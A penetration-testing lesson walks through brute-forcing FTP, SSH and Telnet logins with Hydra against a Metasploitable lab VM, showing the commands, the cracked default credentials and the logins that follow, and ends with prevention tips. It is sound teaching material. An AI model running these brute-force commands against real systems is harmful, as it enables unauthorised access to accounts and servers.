Table of Contents
In the previous lesson, I demonstrated to you the easy way to exploit and server and get the shell intersection. In this lesson, you are going to learn a complicated and pretty powerful way to get the shell intersection is Brute-forcing.
At an earlier stage, if an authenticated user tries to access the FTP server, they need an appropriate username and password to get into the FTP server.
┌─[mrdev@mr-dev]─[~]
└──╼ $
ftp 192.168.56.3
Connected to 192.168.56.3.
220 (vsFTPd 2.3.4)
Name (192.168.56.3:mrdev):
msfadmin
331 Please specify the password.
Password:
msfadmin
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Goal: Try to perform a brute-force attack on the SSH, FTP, and Telnet services to get the login username and password.
What if a hacker tries to get into the server then they must need a proper authenticated username and password, otherwise, the login failed.
┌─[mrdev@mr-dev]─[~]
└──╼ $
ftp 192.168.56.3
Connected to 192.168.56.3.
220 (vsFTPd 2.3.4)
Name (192.168.56.3:mrdev):
hacker
331 Please specify the password.
Password:
hacker
530 Login incorrect.
ftp: Login failed
ftp>
At this place, a Brute-force attack comes to work.
What is the meaning of Brute Force Attack?
A brute force attack is a hacking method that uses trial and error to crack passwords, login credentials, and encryption keys. It is a simple yet reliable tactic for gaining unauthorized access to individual accounts and organizations' systems and networks.
Brute-force the FTP server
What if you don't find any vulnerability on the target machine, then what we should do? The answer is you have to perform a brute-force attack on the target machine and try to crack the passwords.
While this is good, it’s not really practical to manually test every possible password. That’s why Hydra takes wordlists. You can specify a WordList instead of a single password.
Note: A brute-force attack can take lots of time, so keep calm and wait for the end.
There are lots of Brute-forcing tools available among then few are listed below:
- hydra
- Xhydra
- Ncrack
- medusa
- Patator
Brute-forcing using Hydra
According to Wiki:
Hydra is a parallelized network login cracker built in various operating systems like Kali Linux, Parrot, and other major penetration testing environments. Hydra works by using different approaches to perform brute-force attacks in order to guess the right username and password combination.
To find out helpful information about Hydra just run the help command:
┌─[mrdev@mr-dev]─[~]
└──╼ $
hydra -h
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
Options:
-R restore a previous aborted/crashed session
-I ignore an existing restore file (don't wait 10 seconds)
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-y disable use of symbols in bruteforce, see above
-r
rainy mode for password generation (-x)
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-o FILE write found login/password pairs to FILE instead of stdout
-b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel per target (default: 16)
-T TASKS run TASKS connects in parallel overall (for -M, default: 64)
-w / -W TIME wait time for a response (32) / between connects per thread (0)
-c TIME wait time per login attempt over all threads (enforces -t 1)
-4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-O use old SSL v2 and v3
-K do not redo failed attempts (good for -M mass scanning)
-q do not print messages about connection errors
-U service module usage details
-m OPT options specific for a module, see -U output for information
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs.
Licensed under AGPL v3.0. The newest version is always available at;
https://github.com/vanhauser-thc/thc-hydra
Please don't use in military or secret service organizations, or for illegal
purposes. (This is a wish and non-binding - most such people do not care about
laws and ethics anyway - and tell themselves they are one of the good ones.)
These services were not compiled in: afp ncp oracle sapr3 smb2.
Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:[email protected]:9150 (or: socks4:// connect://)
% export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
% export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
% export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
┌─[✗]─[mrdev@mr-dev]─[~]
└──╼ $
From the above help command, we found that
- -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
- -p PASS or -P FILE try password PASS, or load several passwords from FILE
- -v / -V / -d verbose mode / show login+pass for each attempt / debug mode
After all, these, let's perform a Brute-force Attack:
┌─[mrdev@mr-dev]─[~]
└──╼ $
hydra -L wordlist.lst -P wordlist.lst ftp://192.168.56.3
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-15 01:12:50
[DATA] max 16 tasks per 1 server, overall 16 tasks, 400 login tries (l:20/p:20), ~25 tries per task
[DATA] attacking ftp://192.168.56.3:21/
[21][ftp] host: 192.168.56.3 login: user password: user
[21][ftp] host: 192.168.56.3 login: msfadmin password: msfadmin
[STATUS] 300.00 tries/min, 300 tries in 00:01h, 100 to do in 00:01h, 16 active
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-01-15 01:14:11
┌─[mrdev@mr-dev]─[~]
└──╼ $
From above, we found that the username and password that marked in bold. Now, we can try to get into the FTP server using the below commands:
- You can learn more about FTP servers:
How Hackers Attempt to Gain Unauthorized Access - Login Attacks
This article explores various methods that hackers use to attempt unauthorized access through login attacks. Understanding these attack techniques can help individuals and organizations better defend against unauthorized access attempts.
┌─[mrdev@mr-dev]─[~]
└──╼ $
ftp 192.168.56.3
Connected to 192.168.56.3.
220 (vsFTPd 2.3.4)
Name (192.168.56.3:mrdev):
user
331 Please specify the password.
Password:
user
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp>
cd ..
250 Directory successfully changed.
ftp>
ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ftp
drwxr-xr-x 5 1000 1000 4096 May 20 2012 msfadmin
drwxr-xr-x 2 1002 1002 4096 Apr 16 2010 service
drwxr-xr-x 3 1001 1001 4096 May 07 2010 user
226 Directory send OK.
ftp>
cd msfadmin
250 Directory successfully changed.
ftp>
ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 6 1000 1000 4096 Apr 28 2010 vulnerable
226 Directory send OK.
ftp>
cd vulnerable
250 Directory successfully changed.
ftp>
ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 1000 1000 4096 Apr 28 2010 mysql-ssl
drwxr-xr-x 5 1000 1000 4096 Apr 28 2010 samba
drwxr-xr-x 2 1000 1000 4096 Apr 19 2010 tikiwiki
drwxr-xr-x 3 1000 1000 4096 Apr 16 2010 twiki20030201
226 Directory send OK.
ftp>
cd tikiwiki
250 Directory successfully changed.
ftp>
ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 1000 1000 10784297 Apr 09 2008 tikiwiki-1.9.11.zip
-rw-r--r-- 1 1000 1000 10451264 Jun 11 2006 tikiwiki-1.9.4.zip
-rw-r--r-- 1 1000 1000 9577201 Sep 05 2006 tikiwiki-1.9.5.zip
226 Directory send OK.
ftp>
get tikiwiki-1.9.11.zip
local: tikiwiki-1.9.11.zip remote: tikiwiki-1.9.11.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for tikiwiki-1.9.11.zip (10784297 bytes).
226 Transfer complete.
10784297 bytes received in 0.48 secs (21.2650 MB/s)
ftp>
bye
221 Goodbye.
┌─[mrdev@mr-dev]─[~]
└──╼ $
ls
Desktop Downloads Pictures Templates Videos wordlist.lst
Documents Music Public tikiwiki-1.9.11.zip 'VirtualBox VMs'
┌─[mrdev@mr-dev]─[~]
└──╼ $
Brute Forcing the SSH services
The Secure Shell Protocol (SSH) is a cryptographic network protocol for operating network services securely over an unsecured network. Its most notable applications are remote login and command-line execution. SSH applications are based on a client–server architecture, connecting an SSH client instance with an SSH server.
To get a Proper connection you must have a proper username and password credentials. This is also similar to FTP services.
Let's try brute-forcing using Hydra:
- -l LOGIN or -L : FILE login with LOGIN name, or load several logins from FILE
- -p PASS or -P : FILE try password PASS, or load several passwords from FILE
- -t : TASKS run TASKS number of connects in parallel per target (default: 16)
┌─[mrdev@mr-dev]─[~]
└──╼ $
hydra -L wordlist.lst -P wordlist.lst ssh://192.168.56.3 -t 5
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-15 01:21:04
[DATA] max 5 tasks per 1 server, overall 5 tasks, 400 login tries (l:20/p:20), ~80 tries per task
[DATA] attacking ssh://192.168.56.3:22/
[22][ssh] host: 192.168.56.3 login: user password: user
[STATUS] 172.00 tries/min, 172 tries in 00:01h, 228 to do in 00:02h, 5 active
[22][ssh] host: 192.168.56.3 login: msfadmin password: msfadmin
[STATUS] 168.00 tries/min, 336 tries in 00:02h, 64 to do in 00:01h, 5 active
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-01-15 01:23:28
┌─[mrdev@mr-dev]─[~]
└──╼ $
Let's Try to log in with the username and password:
┌─[mrdev@mr-dev]─[~]
└──╼ $
ssh [email protected]
[email protected]'s password:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Fri Jan 14 13:39:53 2022
msfadmin@metasploitable:~$
ls
vulnerable
msfadmin@metasploitable:~$
Attempt to Brute-forcing the Telnet service
Telnet is a protocol that allows you to connect to remote computers (called hosts) over a TCP/IP network (such as the Internet). Using telnet client software on your computer, you can make a connection to a telnet server (that is, the remote host).
Let's try attempt to connect the server with the help of telnet:
┌─[mrdev@mr-dev]─[~]
└──╼ $
telnet 192.168.56.3
Trying 192.168.56.3...
Connected to 192.168.56.3.
Escape character is '^]'.
_ _ _ _ _ _ ____
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
|_|
Warning: Never expose this VM to an untrusted network!
Contact: msfdev[at]metasploit.com
Login with msfadmin/msfadmin to get started
metasploitable login:
As you can see it prompts me to insert the login credentials. Let's try brute force to get the user name and password:
┌─[mrdev@mr-dev]─[~]
└──╼ $
hydra -L wordlist.lst -P wordlist.lst telnet://192.168.56.3
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-15 01:25:39
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 16 tasks per 1 server, overall 16 tasks, 400 login tries (l:20/p:20), ~25 tries per task
[DATA] attacking telnet://192.168.56.3:23/
[23][telnet] host: 192.168.56.3 login: user password: user
[23][telnet] host: 192.168.56.3 login: msfadmin password: msfadmin
[STATUS] 327.00 tries/min, 327 tries in 00:01h, 73 to do in 00:01h, 16 active
[STATUS] 200.00 tries/min, 400 tries in 00:02h, 1 to do in 00:01h, 5 active
[STATUS] 133.33 tries/min, 400 tries in 00:03h, 1 to do in 00:01h, 5 active
┌─[mrdev@mr-dev]─[~]
└──╼ $
Once you find out the username and password try to get a connection:
metasploitable login:
msfadmin
Password:
msfadmin
Last login: Fri Jan 14 14:56:12 EST 2022 on pts/12
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
msfadmin@metasploitable:~$
ls
vulnerable
msfadmin@metasploitable:~$
From the above examples, you find out how a Brute force attack works.
Prevention:
There are many methods to stop or prevent brute force attacks.
The most obvious is a strong password policy. Each web application or public server should enforce the use of strong passwords. For example, standard user accounts should have at least eight letters, a number, uppercase, and lowercase letters, and a special character. Moreover, servers should require frequent password changes.
Let’s investigate other ways to prevent a brute-force attack.
- Limit failed login attempts
- Make the root user inaccessible via SSH by editing the sshd_config file
- Don’t use a default port, edit the port line in your sshd_configfile
- Use Captcha
- Limit logins to a specified IP address or range
- Two-factor authentication
- Unique login URLs
- Monitor server logs
